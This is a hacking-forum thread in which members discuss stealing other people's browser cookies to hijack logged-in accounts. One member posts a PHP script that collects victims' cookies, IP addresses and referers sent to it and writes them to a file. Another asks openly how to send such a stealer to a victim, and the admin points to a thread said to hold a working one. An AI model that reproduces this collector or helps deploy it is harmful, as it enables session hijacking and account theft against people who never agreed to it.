Cookie stealer(s)

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.
Locked
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Cookie stealer(s)

Post by Ritterkreuzträger »

So, there are a lot of cookie-stealing scripts on the net. When i stole one of them, i see something like it: (my sx"s login cookie, with changed hash of course) sethioz_has_you:743.cae34a198d2d4f9c75uy84618gd94dc or like ...index.php?=4372fd%blahblah%24blah
Well, i can put it in my browser"s cookie and get a log-in. But i still dont know the password(Its important to know because 85% of people always using the same password for everything), so my question: which crypt method it is usually using? Are there any real point at all 2 steal cookies?
Top
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:
Contact Sethioz

Re: Cookies?

Post by Sethioz »

first of, could you post the script/s you used ? because so far i have never found a working cookie stealer, would like to test it.

looks like it is md5 hash. im not 100% sure how cookies work, well i know how they work, but that hash is not the actual password, it is something like session id, only that it never changes (on some sites). which means that you can't get the original password if you steal the cookie. This is the reason why most sites ask you for the original password if you want to change any settings or log into admin panel, because if you steal cookie, you can do most things, but you can't change password or access admin panel.

some sites maybe use actual md5 hash of password as cookie, but i highly doubt. you can easily test, by logging in, checking the cookie hash, then you use passwords pro or any other tool like it and put your password in there and see what is the md5 hash of it, if its same, then it really uses password hash as cookie.
Top
Ritterkreuzträger
Allie
Allie
Posts: 105
Joined: Tue Jan 12, 2010 2:59 pm

Re: Cookies?

Post by Ritterkreuzträger »

Code: Select all

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br>
IP: ' .$ip. '<br>
Date/Time: ' .$date. '<br>
Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Prooly not this one, i got few somewhere on computer, but i guess i used this one.
Top
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:
Contact Sethioz

Re: Cookie stealer(s)

Post by Sethioz »

well it works, but it only logs unnecessary info

Code: Select all

Cookie:
IP: 127.0.0.1
Date/Time: 27 May, 2010, 9:56 pm
Referer: http://sethioz.co.uk/
it doesn't save the actual cookie. if you find the one that saves the actual cookie, we can go on with it.
Top
Warzone
Newbie..
Newbie..
Posts: 8
Joined: Fri Feb 19, 2010 1:58 pm

Re: Cookie stealer(s)

Post by Warzone »

hi
can any one please give us a small tutorial on how we can use the cookie stealer
how we send it to the victim
how we get back the information
all the stuff please >>>
thanks Sethioz
Top
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:
Contact Sethioz

Re: Cookie stealer(s)

Post by Sethioz »

i aint got working one. ive been after one myself in fact.

There's a working cookie stealer in this thread:
http://sethioz.com/forum/viewtopic.php?f=47&t=986

further discussion goes there

CLOSED
Top
Locked

Return to “PC / Website / Console / Others > Hacking / Cracking / Exploits / Research”